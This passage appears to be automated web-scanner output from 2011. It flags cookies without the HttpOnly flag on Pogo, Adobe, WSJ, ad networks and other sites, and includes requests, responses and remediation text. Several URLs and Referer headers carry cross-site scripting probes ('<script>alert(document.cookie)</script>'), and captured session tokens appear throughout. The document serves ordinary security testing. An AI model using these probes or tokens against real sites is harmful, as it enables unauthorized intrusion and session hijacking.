GET /login/entry.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/lightregview.do Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fbconnect/js.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536962788-New%7C1297128962788%3B
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C8DDA40C8F4C2B65082C50B995B886FC; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/ Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:46 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow HTTP/1.1 Host: event.adxpose.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=050A46D4E4695FF1279B3090A4F21432; evlu=ddad3821-ec58-4641-be95-961ec5aac4d2;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=513148566CAD5DDB4E79FD10B3255E39; Path=/ Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:14:29 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
ADBRITE_SESS_1=20vl1tpukh23pji2agsn60lh44; expires=Mon, 17 Jan 2011 02:58:24 GMT; path=/; domain=www.adbrite.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mb/commerce/purchase_form.php HTTP/1.1 Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/exchange/ HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/marketplace/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/membership/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/membership/logout.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/partnerportal/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/showcase/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/store/html/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/support/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events/main.jsp HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:27:31 GMT Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02) Set-Cookie: AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1c1o9aj6r4w3c;path=/ Cache-Control: max-age=900 Expires: Sun, 09 Jan 2011 05:42:31 GMT Connection: close Vary: Accept-Encoding, User-Agent
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html x ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1 Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /peanutlabs/ HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mt/w2643334g4y223/ HTTP/1.1 Host: www.pixeltrack66.com Proxy-Connection: keep-alive Referer: http://content.yieldmanager.edgesuite.net/atoms/4b/20/4f/fa/4b204ffa9cd07b1ada562ff40d59b324.swf?clickTag=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F2%2C13%253B0cb5d93d88c4bebb%253B12d6864c680%2C0%253B%253B%253B2580633203%2CiQIAAJ2WCQB3lU0AAAAAAHdEFQAAAAAAAgAEAAYAAAAAAP8AAAAHFB5%2DDwAAAAAA660cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk2wQAAAAAAAIAAgAAAAAAYsZkaC0BAAAAAAAAAGY0MDZhMzIwLTFiOGYtMTFlMC1hYjI1LTAwMWIyNDc4NGFhNABwAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Epogo%2Ecom%252Fgames%252Fscrabble%253Fpagesection%253Dfree%5Fhome%5Fhot%5Fgames1%5Fpl%5Fscrabble%2C Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 01:35:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Set-Cookie: PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_clk=54267db83a49b89cd0644d669488302a; path=/ Set-Cookie: mt_lds=54267db83a49b89cd0644d669488302a; expires=Tue, 08-Feb-2011 01:35:14 GMT; path=/ Location: http://www.theiq-quiz.com/hv1iqqz/blender_redirect.php?web_id=CD99&exitpops=9175 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.thedailynews.cc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:20:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 08 Jan 2011 01:20:38 GMT Set-Cookie: UID=15824293; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSASAASQB=KCNAOIEADCPKOCPKACDIKMJH; path=/ Cache-control: private
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a8a/4/a7/%2a/i;227307433;1-0;0;50967133;3454-728/90;34263360/34281238/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O Set-Cookie: id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 09 Jan 2011 02:03:13 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm?fpid=10&sp=y&publisher_redirecturl=http://ad.afy11.net/ad?mode=7 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=undefined%7Cundefined%7Cundefined%7C4; rds=undefined%7Cundefined%7Cundefined%7C14983; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:48:35 GMT Content-Length: 377
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/55290?mpt=3334527&mpvc=&no_cj_c=0&upsid=517004695355 HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-cache Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc= Content-Length: 0 Date: Sun, 09 Jan 2011 02:01:54 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6036333&rn=1663368886&c7=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&c4=http%253A%2F%2Fwww.pandora.com%2Fpeople%2F%253Fcf8db%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%2Fscript%25253E09862348e83%253D1&c8=Pandora%20Radio%20-%20Listen%20to%20Free%20Internet%20Radio%2C%2&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 09 Jan 2011 01:22:52 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=65044&c5=128887&c6=&cv=1.3&cj=1&rn=606698040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:22:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=268141464&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fhome%2Fhome.jsp%3Ff9258%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E4225969d669%3D1&d.r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:24:25 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pageSection=footer_board HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
